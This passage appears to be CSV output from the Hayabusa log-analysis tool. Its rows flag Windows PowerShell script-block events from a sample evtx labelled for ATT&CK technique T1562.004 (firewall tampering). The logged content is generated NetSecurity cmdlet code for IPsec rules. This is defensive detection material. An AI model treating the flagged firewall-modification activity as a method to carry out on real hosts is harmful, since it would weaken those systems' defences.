$__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') 
-and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 
'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', 
$__cmdletization_methodParameters,",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceType",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecRule' -Alias '*' function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, 
[Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, 
ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 